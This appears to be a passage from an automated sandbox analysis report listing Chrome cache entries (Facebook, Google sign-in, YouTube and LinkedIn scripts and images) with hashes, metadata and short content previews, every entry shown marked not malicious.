                                                                                                                                                                                  URL:https://static.xx.fbcdn.net/rsrc.php/v3ild_4/yu/l/en_US/-__AvVAHG015OW04FZJFYcNb1n1Dnz-toWuECcer9ZzpLIj9cqpcLjQD4AgT6FzeeVDYvatkvPhoO0d94eNKnR7lOuDENWdRgBu3JfZvdWL_j91Rdzuzi16ygGc1wa-Oq19cevyCvEVQbD2OmPobANp9KHpDnYRWx5vjU9zGmt_6UlA-lU_6SmVEaVrlFSHhTt9z8sp55HfXW__mMgFRlCsGN0FHwCFoDf7C27gzi95_wmB-51YxoStyBz2gEpqWzCjqUWMgaogygfp_uoh2pEQn4HVER6y-GdB52bvQ0.js?_nc_x=Ij3Wp8lg5Kz
                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("CometLogInHiddenInputs_data.graphql",[],(function(a,b,c,d,e,f){"use strict";a=function(){var a=[{alias:null,args:null,kind:"ScalarField",name:"name",storageKey:null},{alias:null,args:null,kind:"ScalarField",name:"value",storageKey:null}];return{argumentDefinitions:[],kind:"Fragment",metadata:null,name:"CometLogInHiddenInputs_data",selections:[{alias:null,args:null,kind:"ScalarField",name:"prefill_contactpoint",storageKey:null},{alias:null,args:null,kind:"ScalarField",name:"prefill_source",storageKey:null},{alias:null,args:null,kind:"ScalarField",name:"idd_user_crypted_uid",storageKey:null},{alias:null,args:null,kind:"ScalarField",name:"locale",storageKey:null},{alias:null,args:null,concreteType:"LoginNameValue",kind:"LinkedField",name:"lsd",plural:!1,selections:a,storageKey:null},{alias:null,args:null,concreteType:"LoginNameValue",kind:"LinkedField",name:"jazoest",plural:!1,selections:a,storageKey:null},{alias:null,args:null,kind:"ScalarField",name:"login_source

                                                                                                                                                                                  Chrome Cache Entry: 914

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 1x1, segment length 16, comment: "Lavc59.37.100", baseline, precision 8, 576x576, components 3
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):22861
                                                                                                                                                                                  Entropy (8bit):7.915860154320744
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:PqsPXn/DvxyEG+TEh5M/FfYuOXKssc58VePnUnXMzb0dKFdNAuF3Gmyr7w:PT/DvA5Mkassy8Ve+czIdluF3qw
                                                                                                                                                                                  MD5:D07E036DB76EBCEF4CF746F1837700EE
                                                                                                                                                                                  SHA1:C6399287084EF8F2CD6CE2128849EB32AA7DDAE2
                                                                                                                                                                                  SHA-256:3AFDD205A5583087A0DE3593EA9A165A4A330BC58DD32A3176721CB9F3858114
                                                                                                                                                                                  SHA-512:88B9A37C4CB171CCE06D3A4DA9B0902819CCE87721B911BDA2364E06E928A1A8953B79702FFAD17CA9BFA1CFF1FCFAC42EAB5CC6C1CDAD77820A136D3B9B581A
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://scontent-lga3-2.xx.fbcdn.net/v/t15.5256-10/426627967_274247019022435_8910041291589134730_n.jpg?_nc_cat=1&ccb=1-7&_nc_sid=1a7029&_nc_ohc=NGGOrhuGdQ8AX-vclbG&_nc_ht=scontent-lga3-2.xx&oh=00_AfBNBGvisGlZbXNey4HuExCzAZEgB8Cd3Cu5BfOypHArTg&oe=65DADF0D
                                                                                                                                                                                  Preview:......JFIF..............Lavc59.37.100....C..................................................................................................................................................!1QqA..s2ra.."...V..7t6.3..U..R.$5#.B4C.%E.e..b.S.c.&..'DFu.H..T........................1!.A.aQ"2.q..#r......R.$cC.3.6......@.@.."...................?...;..m.S.--......&:ffy.......3...J...Ln..I\..,u&!.;..Z...>..}..y......}.J.R&.<g...|...A.g...7iyop..)q...)..bS..k....U.,.f..{6g.q.1..#..T.q....&=.%.7.....V....&xLO1..(..b8..6....S1.z2.:..kf.w.}.U.S8.}..m.*.....L..R.L.U.%3....iv......3.-.N~...F....E.f}...g.i.SW.....{1..6...s..W..3..K.owov.:.u.....D..u.,F].3^...k.5...N.....[.Vf".3<g.}..I..I.X..C....6c..u.7kt....!...D...2v{.\....vuq.wK...n.R.R.b?H..ZtEc.-....b:M.$6 ....*......;x.v....).DVzd.Z...O..;.2.T.&..M7.it.u.6..RV..)*L.&'..)...9.4E-UR....5LW.Uz.V...I.P..jU..1..&.......M....L.q...5...56$.R=k{.4.N.....Q1..X...jU....>....fxEx....V|......X...B....ZE=...K...".

                                                                                                                                                                                  Chrome Cache Entry: 915

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (16083)
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):740380
                                                                                                                                                                                  Entropy (8bit):5.729920688068108
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:6144:ZA18+tja0OU+uiAlgU/u0rLDmi6Dcga7ciEskOxCoiuNRF:ZTGjvOZArrdciBkpSF
                                                                                                                                                                                  MD5:F98FC311A243467E1323D5CF6E73D4E9
                                                                                                                                                                                  SHA1:C917CCF1F88AA7D74C8CDD4B3A4B5C5270FFA520
                                                                                                                                                                                  SHA-256:86B01C31FAF78C4C275A4CD608DD112C461B7B3553D50129EFED438000D392A8
                                                                                                                                                                                  SHA-512:149022F0DA5D7491E9AE198D3DB033865AE1D0E399A0F0BD98BA3EDE34659461D0042B962D10B4DFD45DD29850C6FE734D6027DE00BE4493B8CAC31B6B401516
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:"https://www.gstatic.com/_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en_US.QKwFb1UtQb4.es5.O/ck=boq-identity.AccountsSignInUi.NrxHlLi3bwM.L.B1.O/am=P2CJlmMBEJhZTvP3jJPDAAAAAAAAAAAAawA7/d=1/exm=LEikZe,_b,_tp,byfTOb,lsjVmc/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlHX7bqWFdDNmEBWjhJk6Qjl972aUA/ee=ASJRFf:LANRae;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:BDnJmb;EmZ2Bf:zr1jrb;Erl4fe:FloWmf;JsbNhc:Xd8iUd;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Oj465e:KG2eXe;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;UpnZUd:nnwwYc;XdiAjb:NLiXbe;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;eBAeSb:zbML3c;iFQyKf:vfuNJf;io8t5d:yDVVkb;kMFpHd:OTA3Ae;nAFL3:NTMZac;nTuGK:JKNPM;oGtAuc:sOXFj;oSUNyd:K0PMbc;oXZmbc:tUnxGc;pXdRYb:fqEYIb;qddgKe:xQtZb;sP4Vbe:VwDzFe;uY49fb:COQbmf;ul9GGd:VDovNc;vNjB7d:YTxL4;wR5FRb:siKnQd;yxTchf:KUM7Z/m=n73qwf,SCuOPb,IZT63,vfuNJf,UUJqVe,ws9Tlc,siKnQd,STuCOe,njlZCf,fJpY1b,b3kMqb,EGw7Od,ZUKRxc,my67ye,t2srLd,EN3i8d,hmHrle,mWLH9d,NOeYWe,O6y8ed,fqEYIb,PrPYRd,MpJwZc,hc6Ubd,Rkm0ef,KUM7Z,oLggrd,inNHtf,L1AAkb,lwddkf,SpsfSb,fFzhe,tUnxGc,aW3pY,EFQ78c,xQtZb,I6YDgd,zbML3c,zr1jrb,vHEMJe,YHI3We,YTxL4,bSspM,Uas9Hd,zy0vNb,K0PMbc,AvtSve,qmdT9,xBaz7b,eVCnO,LDQI"
                                                                                                                                                                                  Preview:"use strict";_F_installCss(".O0WRkf{-webkit-user-select:none;transition:background .2s .1s;border:0;border-radius:3px;cursor:pointer;display:inline-block;font-size:14px;font-weight:500;min-width:4em;outline:none;overflow:hidden;position:relative;text-align:center;text-transform:uppercase;-webkit-tap-highlight-color:transparent;z-index:0}.A9jyad{font-size:13px;line-height:16px}.zZhnYe{transition:box-shadow .28s cubic-bezier(0.4,0,0.2,1);background:#dfdfdf;box-shadow:0px 2px 2px 0px rgba(0,0,0,.14),0px 3px 1px -2px rgba(0,0,0,.12),0px 1px 5px 0px rgba(0,0,0,.2)}.zZhnYe.qs41qe{transition:box-shadow .28s cubic-bezier(0.4,0,0.2,1);transition:background .8s;box-shadow:0px 8px 10px 1px rgba(0,0,0,.14),0px 3px 14px 2px rgba(0,0,0,.12),0px 5px 5px -3px rgba(0,0,0,.2)}.e3Duub,.e3Duub a,.e3Duub a:hover,.e3Duub a:link,.e3Duub a:visited{background:#4285f4;color:#fff}.HQ8yf,.HQ8yf a{color:#4285f4}.UxubU,.UxubU a{color:#fff}.ZFr60d{position:absolute;top:0;right:0;bottom:0;left:0;background-color:tran

                                                                                                                                                                                  Chrome Cache Entry: 916

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (1210)
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):78646
                                                                                                                                                                                  Entropy (8bit):5.412136972940148
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:1536:w/Q5Up0BWTFRcxRpIoMwetxBJ9YDf4YRPlF/hyqqR4Qj2W:87mM1OxAx
                                                                                                                                                                                  MD5:908E3A26A43D87BAC9396377A9C4B6A8
                                                                                                                                                                                  SHA1:B9DDB61F1D0A4ED930881B909D3A4B01B2E62C7A
                                                                                                                                                                                  SHA-256:417FD55B390293D45901B37398ACFC8C3B4FEDE6A395F541C2EE48F732990D61
                                                                                                                                                                                  SHA-512:4FD58BA30456F96A8704412123BCA4C4A48E976E28BAEADED37232FA7A3C4C3FBAA6B79988DC7190D569D1B6024FB0C2F3EAD621A3E2D280C024D7EEC01011B6
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://www.youtube.com/s/desktop/87423d78/jsbin/webcomponents-sd.vflset/webcomponents-sd.js
                                                                                                                                                                                  Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var k;function aa(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}function p(a){var b="undefined"!=typeof Symbol&&Symbol.iterator&&a[Symbol.iterator];if(b)return b.call(a);if("number"==typeof a.length)return{next:aa(a)};throw Error(String(a)+" is not an iterable or ArrayLike");}function q(a){if(!(a instanceof Array)){a=p(a);for(var b,c=[];!(b=a.next()).done;)c.push(b.value);a=c}return a}.function ba(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var ca=ba(this);function r(){for(var a=Number(this),b=[],c=a;c<arguments.length;c++)b[c-a]=arguments[c];return b};/*..Copyright (c) 2016 The Polymer Project Authors. All rights reserved..This code may only be used unde

                                                                                                                                                                                  Chrome Cache Entry: 918

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):490
                                                                                                                                                                                  Entropy (8bit):5.231372862001212
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12:kxeXjxeX4wFrimobO4xpOPdsioQgKfvDkRle8kbRNfeX60:kMYDZimobPxIPu7QgKfLZprGJ
                                                                                                                                                                                  MD5:97CAE0078A9DD441BB3CBB6A1BC234AB
                                                                                                                                                                                  SHA1:A575C8BAA3BDBEF277A82B4F6B4D7741197E25B2
                                                                                                                                                                                  SHA-256:E1B58C6A10E789244835530A36AAB8C50681E5E11D9C0B596694EE601EF08B24
                                                                                                                                                                                  SHA-512:3BA879BAF17E992F91F67435584F79539ABEF8CF175949669DDCCB174CBB7593B2E1BA18C857ECCE1CCEC8660CC6268FD610F0EAF4DCF8D068D9B836BEE2F862
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:"https://www.gstatic.com/_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en_US.J6zlSvuPGsg.es5.O/ck=boq-identity.AccountsSignInUi.y688-Pa0BpE.L.B1.O/am=P2CJlmMBEISZlnP-nnFyGAAAAAAAAAAArAHs/d=1/exm=A7fCU,AvtSve,Ctsu,EFQ78c,EGw7Od,EN3i8d,I6YDgd,IZ1fbc,IZT63,K0PMbc,KUM7Z,L1AAkb,LDQI,LEikZe,MpJwZc,NOeYWe,NTMZac,O6y8ed,PHUIyb,PrPYRd,RMhBfe,Rkm0ef,RqjULd,Rusgnf,SCuOPb,STuCOe,SpsfSb,UPKV3d,UUJqVe,Uas9Hd,VwDzFe,W2YXuc,YHI3We,YTxL4,ZUKRxc,ZZ4WUe,ZwDk9d,_b,_tp,aW3pY,b3kMqb,bPkrc,bSspM,bTi8wc,bm51tf,byfTOb,eVCnO,fFzhe,fJpY1b,fqEYIb,hc6Ubd,hmHrle,iAskyc,inNHtf,kSPLL,lsjVmc,ltDFwf,lwddkf,mWLH9d,my67ye,n73qwf,njlZCf,oLggrd,pxq3x,q0xTif,qPfo0c,qmdT9,sOXFj,siKnQd,soHxf,t2srLd,tUnxGc,vHEMJe,vfuNJf,w9hDv,ws9Tlc,xBaz7b,xQtZb,yRXbo,ywOR5c,zbML3c,ziXSP,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlHublJNG6l_TtY5gqKGP1QzXq7-qQ/ee=ASJRFf:LANRae;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:yt7X5e;EmZ2Bf:zr1jrb;Erl4fe:FloWmf;JsbNhc:Xd8iUd;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Oj465e:KG2eXe;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;UpnZUd:nnwwYc;XdiAjb:NLiXbe;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;eBAeSb:zbML3c;iFQyKf:vfuNJf;io8t5d:yDVVkb;kMFpHd:OTA3Ae;nAFL3:NTMZac;nTuGK:JKNPM;oGtAuc:sOXFj;oSUNyd:K0PMbc;oXZmbc:tUnxGc;pXdRYb:fqEYIb;qddgKe:xQtZb;sP4Vbe:VwDzFe;uY49fb:COQbmf;ul9GGd:VDovNc;vNjB7d:YTxL4;wR5FRb:siKnQd;yxTchf:KUM7Z/m=XiNDcc"
                                                                                                                                                                                  Preview:"use strict";this.default_AccountsSignInUi=this.default_AccountsSignInUi||{};(function(_){var window=this;.try{._.LIa=_.y("XiNDcc",[_.aoa]);._.k("XiNDcc");.var pI=function(a){_.J.call(this,a.Ha);this.aa=a.Ea.hz};_.A(pI,_.J);pI.Ba=function(){return{Ea:{hz:_.oI}}};pI.prototype.mB=function(){var a=this.aa;_.G3a(a);_.F3a(a)};_.K(pI.prototype,"IYtByb",function(){return this.mB});_.M(_.LIa,pI);._.l();.}catch(e){_._DumpException(e)}.}).call(this,this.default_AccountsSignInUi);.// Google Inc..

                                                                                                                                                                                  Chrome Cache Entry: 919

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (1354)
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):186380
                                                                                                                                                                                  Entropy (8bit):5.512786973993877
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3072:SYyvr5xyecNdRk3zE63vUWl6oPCOQ5whSWIjKUs7dDmn0v8umA8Qi4UJ7UwOwdwr:SYkr5xek3zEwvUWl6oPCOQ5whObs7dDF
                                                                                                                                                                                  MD5:7554AE17C5023ECC6D0FFC1E8775BC2F
                                                                                                                                                                                  SHA1:37B39540102E29993F710047ED89BBE3B47A3A2B
                                                                                                                                                                                  SHA-256:6101EEA4239DED7503B74732D078DE0DE0E31D9465DE3876B1641802DD299200
                                                                                                                                                                                  SHA-512:32B21C1D58028A46D7B1C67A79F1348DE19C9316B0CE0BF225904686A81033051B51AD06D6E37D41EA281E5A0D547D58D553D3579BEB23115B3715ECF348EBFB
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://static.licdn.com/sc/h/6y2czwba46q3wsh2b0d0g6trj
                                                                                                                                                                                  Preview:this.default_gsi=this.default_gsi||{};.(function(b){var l=this;try{var Ia,U,u,p,Ja,Ka;Ia=function(a){var c=0;return function(){return c<a.length?{done:!1,value:a[c++]}:{done:!0}}};U="function"==typeof Object.defineProperties?Object.defineProperty:function(a,c,b){if(a==Array.prototype||a==Object.prototype)return a;a[c]=b.value;return a};u=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof l&&l,"object"==typeof self&&self,"object"==typeof global&&global];for(var c=0;c<a.length;++c){var b=a[c];if(b&&b.Math==Math)return b}throw Error("a");.}(this);p=function(a,c){if(c)a:{var b=u;a=a.split(".");for(var e=0;e<a.length-1;e++){var f=a[e];if(!(f in b))break a;b=b[f]}a=a[a.length-1];e=b[a];c=c(e);c!=e&&null!=c&&U(b,a,{configurable:!0,writable:!0,value:c})}};p("Symbol",function(a){if(a)return a;var c=function(a,c){this.g=a;U(this,"description",{configurable:!0,writable:!0,value:c})};c.prototype.toString=function(){return this.g};var b="jscomp_symbol_"+(1E9*Math.random()>>>0

                                                                                                                                                                                  Chrome Cache Entry: 920

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 50x50, components 3
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):1657
                                                                                                                                                                                  Entropy (8bit):7.081028840643324
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:48:ggksiWu1wUyOWzknhLb40uDEmihsmlxas6W2jwJaFM:1kRwshLb40uDEhhsKxanXj/K
                                                                                                                                                                                  MD5:477F7BA011B779D8CCC87C42ECE12250
                                                                                                                                                                                  SHA1:C73DDE35B7ECAC63B2A97E752EDE14B27412CFA5
                                                                                                                                                                                  SHA-256:5B79EAF028C29C8E19ABDFD88F45E6C52C496CB12278187DC1FDBA81E26A19E8
                                                                                                                                                                                  SHA-512:C83849DE8801DE85B248288D89365258EDDC0A5D35D9DC9186EC26A199B91653DE219AB0200DC39135E4311607974F5FFAFB30084D7F3099A9D1D25EFAF89C44
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://scontent-lga3-2.xx.fbcdn.net/v/t39.30808-1/413973828_122141038328035932_1018688146031695318_n.jpg?stp=c0.6.50.50a_cp0_dst-jpg_p50x50&_nc_cat=1&ccb=1-7&_nc_sid=596444&_nc_ohc=gIG0B0H0NDEAX81usT0&_nc_ht=scontent-lga3-2.xx&oh=00_AfA5turvVBTvaY8T1g9S7QlBn1XNeIy6griylyAeUQVPGg&oe=65D9F9BD
                                                                                                                                                                                  Preview:......JFIF..............Photoshop 3.0.8BIM.......h..(.bFBMD0a000a6e010000e101000078020000b4020000ff020000c503000089040000c0040000fe0400003e05000079060000....C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((......2.2.."............................................................................}-gG9H.IH;....QN.fv..B.N..D...U.............WM..* ".t..].#.....%...........................!"#12$3A.................3.z...jZQ5.....>Bb<.fj6t.s..Ic...l..5<.K1Y..W....[....9...U...5pk.@.`GZv4).....3C.Y.N...'........................................!........?....6GQO.a.HH....C........................................?..dY.C...D/C.vu..............................!"12ABQaq..3. #$Rr..........?...6ah.....U......Q-..Y.<..T..}.f.-......;F.y-..o..abed`.p....L....J...@.9.k...w.D.....7:F..R.......b.W..7..[.fe>..B..x.......J>.4nN..).._...$....................!A1Qaq.. ............?!.....am..r..9...5.%.IF.X.

                                                                                                                                                                                  Chrome Cache Entry: 921

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (1394)
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):282836
                                                                                                                                                                                  Entropy (8bit):5.635657180807433
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3072:G6W8fTBA4PJNu4j+09RCERy1SRjVxjw3rZOZWHxnrCiPUHZT:t2I9Rtw7ZOZWHsiPIp
                                                                                                                                                                                  MD5:F97E0F9BE0EF03F822D76FB5B29E9E99
                                                                                                                                                                                  SHA1:34C8CC88C3D47F47FD97F65D46F971F98206B04A
                                                                                                                                                                                  SHA-256:8184C6962275374892C20BDFA44098229756C73C552656BD2D6B9388F7163090
                                                                                                                                                                                  SHA-512:93556955400A5659FE0C25011B6FDB7480D59517646497E2932E517232A91BB96337F556672B9DCC6A3474A7645D7886186E009139D44932D22B87078D2174EA
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://www.youtube.com/s/desktop/87423d78/jsbin/www-searchbox.vflset/www-searchbox.js
                                                                                                                                                                                  Preview:(function(){'use strict';var m;function aa(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}.var ba="function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ca(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}.var ea=ca(this);function v(a,b){if(b)a:{var c=ea;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&null!=b&&ba(c,a,{configurable:!0,writable:!0,value:b})}}.v("Symbol",function(a){function b(f){if(this instanceof b)throw new TypeError("Symbol is not a constructor");return new c(d+(f||"")+"_"+e++,f)}.function c(f,g){this.g=f;ba(this,"description",{configurable:!0,writable:!0,va

                                                                                                                                                                                  Chrome Cache Entry: 922

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):249446
                                                                                                                                                                                  Entropy (8bit):5.470579685220208
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3072:IVyBYOfI26udxTWTcTEDM2j16TcTEDM2ilGb+UPhHo6CmEMDWwyF:oyBzZ3dNo6CFMqwyF
                                                                                                                                                                                  MD5:3A9B92C1093DEB1F83F57CE9387856F3
                                                                                                                                                                                  SHA1:375489BE5E642B11E62149F791C3DF5C66B6CFBA
                                                                                                                                                                                  SHA-256:F5D13C67089BF5CDBB1B349183598BA8DF4DD95A9CF3187E9FD4172F5F5C36FE
                                                                                                                                                                                  SHA-512:6588C81876AB2B528C71AC29CB950D5894DCD71C546A65EDFE8AA0977B2588DC6A8DF2B8A55470C44427A7E61869C6DF67A79B37A59A3A0847F8689D276AD051
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://static.licdn.com/sc/h/3gwr64x0h4e06b6c0wej9hqsz
                                                                                                                                                                                  Preview:!function(e){var t={};function n(r){if(t[r])return t[r].exports;var i=t[r]={i:r,l:!1,exports:{}};return e[r].call(i.exports,i,i.exports,n),i.l=!0,i.exports}n.m=e,n.c=t,n.d=function(e,t,r){n.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:r})},n.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},n.t=function(e,t){if(1&t&&(e=n(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var r=Object.create(null);if(n.r(r),Object.defineProperty(r,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var i in e)n.d(r,i,function(t){return e[t]}.bind(null,i));return r},n.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return n.d(t,"a",t),t},n.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},n.p="",n(n.s=105)}({0:function(e,t,n){"use strict";n.d(t,"j",(function(){return a})),n.d(t,"x",(function()

                                                                                                                                                                                  Chrome Cache Entry: 923

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):1586
                                                                                                                                                                                  Entropy (8bit):4.971538502379734
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:Yj0jutsEgaFs9v8eY2x2UfwhUdt0A66ucXaKUoXab/:Y9ts3aFs90pUbtd79aKpab/
                                                                                                                                                                                  MD5:052B9F6B80876F7C32894105E377BA3B
                                                                                                                                                                                  SHA1:2018FC66AB3C28A18167B11C547406CF1BBAF89A
                                                                                                                                                                                  SHA-256:A7B005C03E9F79AB0D36080925C50F6C101BBBF9853DD849E9A0030A810C89A1
                                                                                                                                                                                  SHA-512:2DC6CA28250F1E5A0EF91D677A6732BD64D5D09C930B78AF226823621C0F1A6BDBDE23583C75F69D5101E918D7FAF40ADD7C236B0AA733D3B02F95528D1B3374
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://www.youtube.com/manifest.webmanifest
                                                                                                                                                                                  Preview:{"name":"YouTube","short_name":"YouTube","background_color":"#FFFFFF","display":"minimal-ui","start_url":"/?feature\u003dytca","scope":"/","icons":[{"src":"https://www.gstatic.com/youtube/img/branding/favicon/favicon_144x144.png","sizes":"144x144","type":"image/png"},{"src":"https://www.gstatic.com/youtube/img/branding/favicon/favicon_192x192.png","sizes":"192x192","type":"image/png"},{"src":"https://www.gstatic.com/youtube/img/web/monochrome/logo_16x16.png","sizes":"16x16","type":"image/png","purpose":"monochrome"},{"src":"https://www.gstatic.com/youtube/img/web/monochrome/logo_32x32.png","sizes":"32x32","type":"image/png","purpose":"monochrome"},{"src":"https://fonts.gstatic.com/s/i/googlematerialicons/video_youtube/v11/white-48dp/1x/gm_video_youtube_white_48dp.png","sizes":"48x48","type":"image/png","purpose":"monochrome"},{"src":"https://www.gstatic.com/youtube/img/web/monochrome/logo_512x512.png","sizes":"512x512","type":"image/png","purpose":"monochrome"}],"theme_color":"#FF0000"

                                                                                                                                                                                  Chrome Cache Entry: 924

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 50x50, components 3
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):1540
                                                                                                                                                                                  Entropy (8bit):6.905819523709836
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:gqQc1spq2jNxrFRvPZp5bi9PEI523gDrBsv8wbtArEjWthZCgEryyzCC0OKtGO:gBiWtBFrP2OQHBqLEEjWhnwDCNptGO
                                                                                                                                                                                  MD5:13543EC4E0E68D652D044DE96447045E
                                                                                                                                                                                  SHA1:54B5876F33DD1D66E8A2E9A3853075FE10ED109A
                                                                                                                                                                                  SHA-256:0CE94DFC97907187AEE50218BEFF1AEFE6BDDDB3C5A8A0127023959352AB15D2
                                                                                                                                                                                  SHA-512:918652C0DAD668F134A62572B7B7B82E09F24B897346AF8DA420DFB63164E44AFCFA68F68975CE4527211F1F9D228C96C9FBC71F682E38855664013695CC728F
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://scontent-lga3-2.xx.fbcdn.net/v/t39.30808-1/332886603_1978368392556459_5717271390274669910_n.jpg?stp=cp0_dst-jpg_p50x50&_nc_cat=1&ccb=1-7&_nc_sid=596444&_nc_ohc=urvazcSmK-0AX-3iuWU&_nc_oc=AQnTgXLRQsHcG47go2KaUbaGzkO56M0R-2qSr_lCZsPbTATswx6A7JHpDI_eVIfBqKw&_nc_ht=scontent-lga3-2.xx&oh=00_AfBje6P1GgkxaPR3_THwgZRvijETji8gn8mobUYqkj3jhA&oe=65DAD042
